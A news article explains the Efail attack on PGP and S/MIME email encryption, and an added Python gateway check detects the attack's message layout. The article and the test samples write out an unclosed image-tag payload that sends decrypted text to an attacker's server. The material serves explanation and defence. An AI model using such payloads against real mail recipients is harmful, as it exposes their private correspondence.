PGP and S/MIME: unsecured encryption

A security issue called Efail endangers e-mail encryption with PGP and S/MIME. The problem: the technology is stuck at the level of the nineties.


    A team of IT security researchers from Bochum and Münster has discovered various security problems in encryption technologies for e-mail. They have named their attack Efail. It exploits a weakness in old but still widely used encryption technologies called OpenPGP and S/MIME and combines it with the capabilities of modern mail programs that can display mails with images and other content, so-called HTML mails.

    So far, mail encryption has been criticized mainly because it is comparatively difficult to use and to set up. In practice, therefore, only a small minority of users use encrypted e-mails. For most users, the attack also has little practical relevance: normal, i.e. unencrypted, e-mails are just as insecure as they were before. So-called transport encryption with TLS is likewise not affected by the attack. However, it only protects the link between the user and their mail provider.

    Encryption with PGP or S/MIME is different: if users use them correctly, they offer a high degree of security, or so it was thought. This view is now somewhat dented, even though the researchers do not attack the encryption itself directly. With a trick, however, attackers can have the content of the messages sent to them after decryption.

    The encryption is bypassed

    How is that possible? Both technologies use encryption modes that do not guarantee the authenticity of the data. This means that an attacker cannot read the mail directly, but he can manipulate its contents. The details are a little more complex, but put simply: if an attacker has access to an encrypted mail, for example by capturing it with a man-in-the-middle attack, he can generate a second encrypted mail based on it. That mail has partially different content, controlled by him.

    Efail exploits this property. Modern mail programs and webmailers make it possible to compose richly designed e-mails out of several parts. In this way, images or fonts can be used, along with the design possibilities of the HTML standard, which also forms the basis of websites. The trick used in Efail: the e-mail is rewritten so that it loads an image from the attacker's server and, in doing so, sends along the unencrypted content of the original mail.

    For example: the attacker sends an HTML part as the first part of a message, one that loads an image, say, but does not close the HTML tag. Something like: <img src="//efail.de/. As the second part, she attaches the encrypted part of a mail that she has captured. In the victim's mail client, the following now happens: first, the encrypted part is decrypted. Second, an image is loaded from the attacker's server. The content of the decrypted text part is appended to the path in encoded form, such as: http://efail.de/GEHEIMER_TEXT (GEHEIMER_TEXT, "secret text", stands for the decrypted content).

    The attacker therefore does not decrypt the mail himself; instead, he gets the recipient of the mail to decrypt the message and then send it in plain text to a server under his control. This also means that even encrypted messages sent in the past are at risk.
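
    A mail gateway can look for the message layout described above before anything is decrypted. The following Python check is an added example, not code from the article or from the researchers; the function names, the regular-expression heuristic and the sample message are assumptions made for illustration.

```python
import re
from email import message_from_string

ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted"}
# Heuristic (assumption): a tag opens a src/href attribute and neither the
# quote nor the tag is closed before the MIME part ends.
DANGLING_URL_ATTR = re.compile(
    r"""<[a-z][^>]*\b(?:src|href)\s*=\s*["'][^"'>]*\Z""", re.IGNORECASE)

def is_encrypted(part):
    """True for S/MIME or PGP/MIME parts and for inline PGP armor."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    body = part.get_payload(decode=True) or b""
    return b"-----BEGIN PGP MESSAGE-----" in body

def find_exfil_layout(raw_message):
    """Return the indexes of HTML parts that end inside an open URL
    attribute and are directly followed by an encrypted part."""
    leaves = [p for p in message_from_string(raw_message).walk()
              if not p.is_multipart()]
    hits = []
    for i, (part, nxt) in enumerate(zip(leaves, leaves[1:])):
        if part.get_content_type() != "text/html":
            continue
        html = (part.get_payload(decode=True) or b"").decode(
            part.get_content_charset() or "utf-8", "replace")
        if DANGLING_URL_ATTR.search(html) and is_encrypted(nxt):
            hits.append(i)
    return hits

def constructed_sample(html):
    """Constructed test message: one HTML part, then a dummy S/MIME part
    (the base64 body is the word CONSTRUCTED, not real ciphertext)."""
    return ("MIME-Version: 1.0\n"
            'Content-Type: multipart/mixed; boundary="B"\n\n'
            "--B\nContent-Type: text/html\n\n" + html + "\n"
            "--B\nContent-Type: application/pkcs7-mime; smime-type=enveloped-data\n"
            "Content-Transfer-Encoding: base64\n\nQ09OU1RSVUNURUQ=\n--B--\n")

if __name__ == "__main__":
    # Layout from the article: unclosed image tag, then the encrypted part.
    print(find_exfil_layout(constructed_sample('<img src="//efail.de/')))
    # Same structure with a properly closed tag is not flagged.
    print(find_exfil_layout(constructed_sample('<img src="//efail.de/logo.png">')))
```

    A hit marks a message for quarantine or manual review; the heuristic covers only the two-part layout described above.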

    Date Of Update: 16 May 2018, 12:03